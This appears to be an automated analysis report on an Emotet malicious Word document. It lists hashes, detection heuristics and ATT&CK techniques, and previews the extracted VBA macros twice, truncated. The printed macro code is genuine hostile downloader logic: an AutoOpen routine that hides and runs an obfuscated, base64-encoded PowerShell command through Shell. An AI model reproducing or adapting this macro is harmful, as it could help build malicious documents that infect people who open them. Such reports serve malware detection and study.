Emotet Office (OLE) malware analysis — malicious · cf278006c2b4f444

MALICIOUS

Office (OLE)

99.5 KB Created: 2018-05-27 21:38:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: bfb0d85ce595a33f5a837f56d0cca9af SHA-1: afbc3ad46bd91469277d42d89faf51cd5bc3abf1 SHA-256: cf278006c2b4f4444d764ea489d43e6af18d296d4e5e3d092962d75bbaff2130

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including an AutoOpen macro, which is a common technique for Emotet. The AutoOpen macro calls a function that uses Shell() to execute a command. This command appears to be constructing a PowerShell command to download and execute a second-stage payload, indicated by the obfuscated string 'powershell -WindowStyle hidden -e lgAgACgAIAAk'. The ClamAV detection name also explicitly identifies it as an Emotet downloader.

Heuristics 7

ClamAV: Doc.Malware.Emotetdldr-10059129-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emotetdldr-10059129-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18134 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18134 bytes
SHA-256: `e5bbd3b0edab63abad0fb1fbaf5f6c511622c8e3320c1cbc46cd5a4e166e594d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "sjOwXDSZjUha" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function wGTPQWNUj() On Error Resume Next jqtFEF = (Qwnmwo * WifMqj - oVTTH * Round(69744)) + (72752 - Rnd(izDdvG) + 37755 + wJolEK) UwzHBE = (Bqtfs * alwVz - RpiSsj * Round(5643)) + (66915 - Rnd(CCwwdi) + 96881 + KckdX) wGTPQWNUj = RSirnmn + DRUkSIMw + qpiED + KdszcBd + UDPOb + XXoQTAJMZ + wIflXfj + fmJbLf + cBmQSamZU + iMQwJCjF + GbMtjkz NkQOzV = (MToUs * mjEbw - Ywovj * Round(28275)) + (80233 - Rnd(RmtMGu) + 88117 + icRDN) End Function Sub Autoopen() On Error Resume Next qjJdk = (LoFAmI * zYojzJ - tZabOw * Round(13961)) + (33512 - Rnd(bJuHzI) + 10383 + CiLQdj) YLMvzpzXj (wGTPQWNUj) awvwwt = (SuUfQJ * PmWuqd - sAzoTD * Round(63384)) + (41281 - Rnd(cQthBQ) + 4654 + UEjrz) End Sub Function YLMvzpzXj(OHhzkBH) On Error Resume Next TswDnr = (VmCBiz * IdpLwz - PXbhwk * Round(23151)) + (48964 - Rnd(uzsNjv) + 44185 + tdHGd) jTSGBr = (XuCvD * UVoHd - zICpkP * Round(24029)) + (12040 - Rnd(SSpklj) + 90574 + jdKhY) IJniB = Shell(TdrMsOMsGZz + Chr(vbKeyP) + bLowGSuj + OHhzkBH, vbHide) EpRca = (iEWiK * iidhrp - YFbNKS * Round(77935)) + (49544 - Rnd(IiTOb) + 71952 + ATmlEK) End Function Attribute VB_Name = "wKaHwQkwl" Function RSirnmn() On Error Resume Next ONzAz = (JuOWs * ihCztu - vwfEK * Round(84864)) + (52813 - Rnd(PzzAh) + 67597 + BmEIQ) HDsmCRjE = "owers" + "HeLL -W" + "inDowsTyle" + " hidden " + "-e LgAgACgAIAAk" MHPilO = (KOXCNz * YiIpH - zuwPV * Round(21457)) + (17655 - Rnd(jPukd) + 46510 + rQWZdw) ZoZqTanb = "AFMAaABlAE" + "wATABpAE" + "QAWwAxAF" + "0AKwA" + "kAFMAaABFA" + "GwAbABpAEQA" + "WwAxADMAXQAr" + "ACcAeAAnACkAK" + "AAoACgA" Aaznk = (sTdPA * zRLzMa - QiwdR * Round(68160)) + (48448 - Rnd(hSmPiX) + 84722 + VShbwU) CfnPHwcWiF = "KAAiAHs" + "AMQA1ADEAfQB7A" + "DkANgB9" + "AHsAMQAyADAAfQB" + "7ADEA" + "MAA2AH0AewAxA" + "DAAfQB" mijjb = (fQJzY * cBzfEK - KArAW * Round(43443)) + (9580 - Rnd(pjiwH) + 90952 + Mwhzw) TVinpzwGM = "7ADEAMwAz" + "AH0AewA3" + "ADIAfQB7ADYAOQB" + "9AHsA" + "NAAxAH0AewA" + "xADEAMwB9AHs" + "AOAA5AH0A" + "ewAyADcAfQB7ADU" BBdQG = (PsYndQ * KMuiNM - tqkiA * Round(32615)) + (74758 - Rnd(pzwEM) + 95540 + zOjQj) SwTNMjQoUBM = "ANgB9AHsAMQAwA" + "DUAfQB7ADgAMgB9" + "AHsAOAA0A" + "H0AewAxADgAfQB" + "7ADEANQA2AH0" + "AewA0ADYAfQ" + "B7ADEAMQA0" + "AH0AewA0ADQAfQ" + "B7ADkAMg" fQtAif = (FRTTnb * LQwPpC - CZoZD * Round(58618)) + (1929 - Rnd(juzfj) + 27238 + qdRlB) lcRiUv = "B9AHsANQA" + "wAH0Ae" + "wAxADMAMAB9AHsA" + "OAAxAH0A" + "ewA0ADUAfQB7" + "ADEAMQAyAH0Aew" + "AxADIAMQB9A" + "HsAMQA0ADIAfQB7" + "ADEANAA0A" + "H0AewA2ADEA" XfiRk = (ziPTb * lcrEbf - ktkYW * Round(13727)) + (91454 - Rnd(laUwD) + 2167 + ftKISL) zvzmdljp = "fQB7ADUAO" + "QB9AHsAOQ" + "A4AH0AewAzA" + "DcAfQB7ADEANA" dQaWB = (lilCml * MmGHK - CMIvVX * Round(55916)) + (76473 - Rnd(zuSNph) + 30198 + zAFBi) pBJJRWN = "AxAH0Ae" + "wA1ADMAfQB7AD" + "gAMwB9A" + "HsAMQA1ADUAf" + "QB7ADkAMQB9AHs" + "AOQAzAH0Aew" + "AxADQAO" + "QB9AHsANA" + "A4AH0AewAxADQ" oRLSj = (snCwcJ * UUFwYG - krjZwk * Round(93787)) + (35652 - Rnd(HEoXJ) + 38333 + JFtCFK) IjAfLUp = "AOAB9AHsAMQA0AD" + "MAfQB7AD" + "EAMwAxA" + "H0AewA0ADcA" + "fQB7AD" + "YAMgB9AHsANgA2" + "AH0Ae" + "wAyADQAfQB7A" + "DEANAA2AH0Aew" + "A2ADQ" Ukjquz = (CjuqSz * mWzoZi - tolhBq * Round(90968)) + (86060 - Rnd(EiawPo) + 30690 + CTQFXt) maaVRNznDnL = "AfQB7ADcAOQB9AH" + "sANQAyAH0A" + "ewAzADUAfQB7ADg" + "ANQB9AHsAOQA5" + "AH0AewAxAH0Aew" + "AxADUAMwB9AH" + "sAOAB9AHs" + "AMQA0ADU" RSirnmn = HDsmCRjE + ZoZqTanb + CfnPHwcWiF + TVinpzwGM + SwTNMjQoUBM + lcRiUv + zvzmdljp + pBJJRWN + IjAfLUp + maaVRNznDnL End Function Function DRUkSIMw() On Error Resume Next qWwXjt = (fjzav * JtIzJB - HswSzG * Round(11234)) + (74830 - Rnd(NpVvE) + 82002 + uYJlrD) oPwHR = "AfQB7A" + "DcANwB" + "9AHsAM" + "QAyAD" + "kAfQB7ADEAM" BotVkI = (TwWDY * XiZdoa - SIEAp * Round(35802)) + (29072 - Rnd(Z ... (truncated)

SHA-256: e5bbd3b0edab63abad0fb1fbaf5f6c511622c8e3320c1cbc46cd5a4e166e594d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "sjOwXDSZjUha"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function wGTPQWNUj()
On Error Resume Next
jqtFEF = (Qwnmwo * WifMqj - oVTTH * Round(69744)) + (72752 - Rnd(izDdvG) + 37755 + wJolEK)
UwzHBE = (Bqtfs * alwVz - RpiSsj * Round(5643)) + (66915 - Rnd(CCwwdi) + 96881 + KckdX)
wGTPQWNUj = RSirnmn + DRUkSIMw + qpiED + KdszcBd + UDPOb + XXoQTAJMZ + wIflXfj + fmJbLf + cBmQSamZU + iMQwJCjF + GbMtjkz
NkQOzV = (MToUs * mjEbw - Ywovj * Round(28275)) + (80233 - Rnd(RmtMGu) + 88117 + icRDN)
End Function
Sub Autoopen()
On Error Resume Next
qjJdk = (LoFAmI * zYojzJ - tZabOw * Round(13961)) + (33512 - Rnd(bJuHzI) + 10383 + CiLQdj)
YLMvzpzXj (wGTPQWNUj)
awvwwt = (SuUfQJ * PmWuqd - sAzoTD * Round(63384)) + (41281 - Rnd(cQthBQ) + 4654 + UEjrz)
End Sub
Function YLMvzpzXj(OHhzkBH)
On Error Resume Next
TswDnr = (VmCBiz * IdpLwz - PXbhwk * Round(23151)) + (48964 - Rnd(uzsNjv) + 44185 + tdHGd)
jTSGBr = (XuCvD * UVoHd - zICpkP * Round(24029)) + (12040 - Rnd(SSpklj) + 90574 + jdKhY)
IJniB = Shell(TdrMsOMsGZz + Chr(vbKeyP) + bLowGSuj + OHhzkBH, vbHide)
EpRca = (iEWiK * iidhrp - YFbNKS * Round(77935)) + (49544 - Rnd(IiTOb) + 71952 + ATmlEK)
End Function


Attribute VB_Name = "wKaHwQkwl"
Function RSirnmn()
On Error Resume Next
ONzAz = (JuOWs * ihCztu - vwfEK * Round(84864)) + (52813 - Rnd(PzzAh) + 67597 + BmEIQ)
HDsmCRjE = "owers" + "HeLL -W" + "inDowsTyle" + " hidden " + "-e LgAgACgAIAAk"
MHPilO = (KOXCNz * YiIpH - zuwPV * Round(21457)) + (17655 - Rnd(jPukd) + 46510 + rQWZdw)
ZoZqTanb = "AFMAaABlAE" + "wATABpAE" + "QAWwAxAF" + "0AKwA" + "kAFMAaABFA" + "GwAbABpAEQA" + "WwAxADMAXQAr" + "ACcAeAAnACkAK" + "AAoACgA"
Aaznk = (sTdPA * zRLzMa - QiwdR * Round(68160)) + (48448 - Rnd(hSmPiX) + 84722 + VShbwU)
CfnPHwcWiF = "KAAiAHs" + "AMQA1ADEAfQB7A" + "DkANgB9" + "AHsAMQAyADAAfQB" + "7ADEA" + "MAA2AH0AewAxA" + "DAAfQB"
mijjb = (fQJzY * cBzfEK - KArAW * Round(43443)) + (9580 - Rnd(pjiwH) + 90952 + Mwhzw)
TVinpzwGM = "7ADEAMwAz" + "AH0AewA3" + "ADIAfQB7ADYAOQB" + "9AHsA" + "NAAxAH0AewA" + "xADEAMwB9AHs" + "AOAA5AH0A" + "ewAyADcAfQB7ADU"
BBdQG = (PsYndQ * KMuiNM - tqkiA * Round(32615)) + (74758 - Rnd(pzwEM) + 95540 + zOjQj)
SwTNMjQoUBM = "ANgB9AHsAMQAwA" + "DUAfQB7ADgAMgB9" + "AHsAOAA0A" + "H0AewAxADgAfQB" + "7ADEANQA2AH0" + "AewA0ADYAfQ" + "B7ADEAMQA0" + "AH0AewA0ADQAfQ" + "B7ADkAMg"
fQtAif = (FRTTnb * LQwPpC - CZoZD * Round(58618)) + (1929 - Rnd(juzfj) + 27238 + qdRlB)
lcRiUv = "B9AHsANQA" + "wAH0Ae" + "wAxADMAMAB9AHsA" + "OAAxAH0A" + "ewA0ADUAfQB7" + "ADEAMQAyAH0Aew" + "AxADIAMQB9A" + "HsAMQA0ADIAfQB7" + "ADEANAA0A" + "H0AewA2ADEA"
XfiRk = (ziPTb * lcrEbf - ktkYW * Round(13727)) + (91454 - Rnd(laUwD) + 2167 + ftKISL)
zvzmdljp = "fQB7ADUAO" + "QB9AHsAOQ" + "A4AH0AewAzA" + "DcAfQB7ADEANA"
dQaWB = (lilCml * MmGHK - CMIvVX * Round(55916)) + (76473 - Rnd(zuSNph) + 30198 + zAFBi)
pBJJRWN = "AxAH0Ae" + "wA1ADMAfQB7AD" + "gAMwB9A" + "HsAMQA1ADUAf" + "QB7ADkAMQB9AHs" + "AOQAzAH0Aew" + "AxADQAO" + "QB9AHsANA" + "A4AH0AewAxADQ"
oRLSj = (snCwcJ * UUFwYG - krjZwk * Round(93787)) + (35652 - Rnd(HEoXJ) + 38333 + JFtCFK)
IjAfLUp = "AOAB9AHsAMQA0AD" + "MAfQB7AD" + "EAMwAxA" + "H0AewA0ADcA" + "fQB7AD" + "YAMgB9AHsANgA2" + "AH0Ae" + "wAyADQAfQB7A" + "DEANAA2AH0Aew" + "A2ADQ"
Ukjquz = (CjuqSz * mWzoZi - tolhBq * Round(90968)) + (86060 - Rnd(EiawPo) + 30690 + CTQFXt)
maaVRNznDnL = "AfQB7ADcAOQB9AH" + "sANQAyAH0A" + "ewAzADUAfQB7ADg" + "ANQB9AHsAOQA5" + "AH0AewAxAH0Aew" + "AxADUAMwB9AH" + "sAOAB9AHs" + "AMQA0ADU"
RSirnmn = HDsmCRjE + ZoZqTanb + CfnPHwcWiF + TVinpzwGM + SwTNMjQoUBM + lcRiUv + zvzmdljp + pBJJRWN + IjAfLUp + maaVRNznDnL
End Function
Function DRUkSIMw()
On Error Resume Next
qWwXjt = (fjzav * JtIzJB - HswSzG * Round(11234)) + (74830 - Rnd(NpVvE) + 82002 + uYJlrD)
oPwHR = "AfQB7A" + "DcANwB" + "9AHsAM" + "QAyAD" + "kAfQB7ADEAM"
BotVkI = (TwWDY * XiZdoa - SIEAp * Round(35802)) + (29072 - Rnd(Z
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.